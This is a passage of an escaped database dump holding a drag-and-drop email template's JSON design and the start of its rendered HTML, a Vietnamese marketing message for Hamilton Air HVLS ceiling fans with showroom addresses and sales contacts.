20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_32\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"Xem th\\u00eam\\\",\\\"calculatedWidth\\\":111,\\\"calculatedHeight\\\":37}},{\\\"id\\\":\\\"GzV0cXrtKM\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_7\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"9_V27eVyHm\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_17\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">T\\u1ed0I \\u01afU H\\u00d3A KH\\u00cd H\\u1eacU TRONG NH\\u00c0 C\\u1ee6A B\\u1ea0N<\\/p>\\\"}},{\\\"id\\\":\\\"XMzpZLmB0i\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_15\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">Qu\\u1ea1t HVLS m\\u1ea1nh m\\u1ebd gi\\u1ed1ng nh\\u01b0 l\\u00e0n gi\\u00f3 t\\u1ef1 nhi\\u00ean, n\\u00f3 s\\u1ebd t\\u1ea1o ra lu\\u1ed3ng kh\\u00f4ng kh\\u00ed l\\u1edbn v\\u00e0 \\u00eam d\\u1ecbu. N\\u00f3 c\\u00f3 th\\u1ec3 thay th\\u1ebf \\u0111i\\u1ec1u h\\u00f2a v\\u00e0 khi\\u1ebfn ng\\u01b0\\u1eddi ng\\u1ed3i trong xe c\\u1ea3m th\\u1ea5y ch\\u00eanh l\\u1ec7ch nhi\\u1ec7t \\u0111\\u1ed9 t\\u1eeb 5-8 \\u0111\\u1ed9. K\\u1ebft h\\u1ee3p v\\u1edbi h\\u1ec7 th\\u1ed1ng AC, n\\u00f3 l\\u00e0m gi\\u1ea3m chi ph\\u00ed. V\\u00e0o m\\u00f9a \\u0111\\u00f4ng, ch\\u1ebf \\u0111\\u1ed9 \\u0111\\u1ea3o ng\\u01b0\\u1ee3c c\\u00f3 th\\u1ec3 \\u0111\\u01b0\\u1ee3c chuy\\u1ec3n \\u0111\\u1ed5i \\u0111\\u1ec3 \\u0111\\u1ea9y kh\\u00f4ng kh\\u00ed \\u1ea5m tr\\u00ean m\\u00e1i nh\\u00e0\\/tr\\u1ea7n nh\\u00e0 xu\\u1ed1ng, \\u0111\\u1ea1t \\u0111\\u01b0\\u1ee3c hi\\u1ec7u qu\\u1ea3 \\u0111i\\u1ec1u ch\\u1ec9nh nhi\\u1ec7t \\u0111\\u1ed9.<\\/p>\\\"}},{\\\"id\\\":\\\"1s_TUuzoZ_\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681373287133-v.jpeg\\\",\\\"width\\\":1583,\\\"height\\\":921},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_27\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"Y1XoyiJXsn\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"phone\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\",\\\"phone\\\":\\\"0386876274\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"tel:{{phone}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#3AAEE0\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_24\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"G\\u1eccI NGAY\\\",\\\"calculatedWidth\\\":106,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_28\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ecf0f1\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_13\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"04gNugS9ys\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"2mvPoFJCm5\\\",\\\"contents\\\":[{\\\"id\\\":\\\"5iu4F_PrCJ\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_8\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"U54rwmEkOc\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"23px 40px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#b8b8b8\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"color: #000000; line-height: 19.6px;\\\\\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<\\/span><br \\/><span style=\\\\\\\"color: #000000; line-height: 19.6px;\\\\\\\">EMAIL: sale@hogiaphat.vn\\u00a0<\\/span><br \\/><span style=\\\\\\\"color: #000000; line-height: 19.6px;\\\\\\\">SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"color: #000000; line-height: 19.6px;\\\\\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"8hu9zilO_e\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"91%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#616888\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"19px 19px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_2\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"N9ssy1A_Ok\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#bbbbbb\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px; color: #000000;\\\\\\\">\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px; color: #000000;\\\\\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ecf0f1\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#272362\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#363675\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":false,\\\"linkHoverUnderline\\\":true,\\\"inherit\\\":false},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":13}\"', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-25 {\\r\\n    width: 150px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50 {\\r\\n    width: 300px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\n@media (max-width: 480px) { #u_content_image_1 .v-container-padding-padding { padding: 10px !important; } #u_content_image_1 .v-src-width { width: auto !important; } #u_content_image_1 .v-src-max-width { max-width: 100% !important; } }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #ffffff;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #ffffff;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #fbfdff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #fbfdff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"background-color: #ecf0f1;width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_image_1\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:40px 10px 19px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680167194545-logo_sunon.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 81%;max-width: 469.8px;\\\" width=\\\"469.8\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 150%; text-align: center; word-wrap: break-word; font-family: inherit; font-size: 20px; font-weight: 700; \\\">GI\\u1ea2I PH\\u00c1P TI\\u1ebeT KI\\u1ec6M N\\u0102NG L\\u01af\\u1ee2NG, L\\u00c0M M\\u00c1T, CH\\u1ed0NG \\u1ea8M V\\u00c0 TH\\u00d4NG GI\\u00d3<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:4px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #000000; line-height: 150%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 150%;\\\"><span style=\\\"font-size: 18px; line-height: 21px;\\\"><strong>T\\u1eacN H\\u01af\\u1edeNG CU\\u1ed8C S\\u1ed0NG THO\\u1ea2I M\\u00c1I<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:6px 10px 5px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 150%; text-align: center; word-wrap: break-word; font-family: helvetica,sans-serif; font-size: 20px; font-weight: 700; \\\">Powerful HVLS Fan series 3<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681372971446-Powerful3-02.jpeg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td 